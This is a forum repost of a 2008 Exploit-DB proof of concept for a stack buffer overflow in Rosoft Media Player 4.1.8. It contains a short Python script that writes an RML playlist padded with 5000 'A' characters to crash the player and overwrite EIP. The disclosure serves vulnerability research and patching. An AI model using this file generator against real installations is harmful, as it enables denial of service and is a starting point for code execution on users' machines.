Exploit Rosoft Media Player 4.1.8 - RML Stack Buffer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5261
Проверка EDB
  1. Пройдено
Автор
WIKTOR SIEROCINSKI
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2008-03-15
Код:
Description:
This is nothing special - there is just flaw in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian. 
This one concerns RML file. This is Stack Based Buffer Overflow vulerability - we can ovewrite EIP. I hope that it was not reported before. 

Author: Wiktor Sierocinski
POC:

#!/usr/bin/python

content = (
"#EXTINF:Played=0\n" + "A" * 5000 + "\n"
)

fd = open("music.rml","w");
fd.write(content)
fd.close();

print "RML FILE CREATED"

# milw0rm.com [2008-03-15]
 
Источник
www.exploit-db.com

Похожие темы